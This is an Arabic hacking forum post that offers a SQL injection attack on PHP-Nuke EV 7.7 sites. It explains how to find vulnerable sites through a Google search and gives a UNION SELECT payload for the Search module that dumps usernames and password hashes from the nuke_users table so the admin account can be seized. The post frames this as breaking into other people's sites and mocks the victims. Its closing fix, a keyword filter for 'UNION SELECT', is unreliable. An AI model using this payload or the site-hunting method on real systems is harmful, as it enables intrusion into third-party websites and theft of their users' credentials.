مسا الخير يا شباب هاي أول مشاركة ألي هون بموقع الأخوية وأرجو أنو تستفيدو مني أستفيد منكم
أنا ليوم رح قدم موضوع أسا ما نزل ولا بمنتدى وهي ثغرة جديدة أوي نزلت في 9-1-2005
وهي خاصة لمجلة النيوك وفينك تخترق أي مجلة وهي سهلة جدا جدا جدا
الطريقة :
أقسم بالله العظيم أن استخدم الطريقة هههههههههه
طيب منبلش
1. روح على موقع الجوجل
www.Google.com
وحط مكان البحث كلمة :
PHPNuke EV 7.7 -R1
تمام الحكي طيب
الجوجل الفهمان رح يطلعلك كتير مواقع مصابة وأكتريتها أجنبية لأنو العرب ما عندهن مجلات نيوك هههههههه
طيب ما علينا
أختر يلي يعجبك من المواقع مثلا ليكون الموقع
www.R-cool.net
ماشي يلي هو موقعي
بصير الموقع هيك على الشكل التالي
www.R-cool.net/modules.php?name=Search
طيب تمام الشغل هيك
ماشي إذا عطاك الموقع خيار للبحث فإن الموقع مصاب 100 % وبتكون أنت اخترقتو برياحة
وإذا ما عطاك فأكيد خود موقع تاني
طيب إذا عطاني بكتب محل كلمة البحث الكلمة التالية : s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
وهو بطلعلك كل الهاشات تبعيت الموقع وأنت دور على أسم المستخدم تبعيت الأدمن وكلمة السر.
طيب ما بدك تعرف شلون منسكر الثغرة
افتح الملف modules/Search/index.php
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
ضيف الكلام ده
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
ملاحظة جميع الحقوق محفوظة لموقع الأخوية ومنتديات كووول يلي هي منتدياتي
وشكرا لكم وأرجو أن يكون الشرح كافي وتمام والكل فهم
-----------------الهــــــــــــــــاكــــــــــــــــــر -------------------
كن ذئبا وإلا سوف تأكلك الأرانب
أسمع لنصيحتي وإلا سوف تضيع في الهاكر
الهاكر يعتمد على 95 % ذكائك الشخصي و5 % على نسبة البرامج
والباقي على غباء الضحية
-----------------الهــــــــــــــــاكــــــــــــــــــر -------------------
تستطيع أن تزور موقعي
www.R-cool.net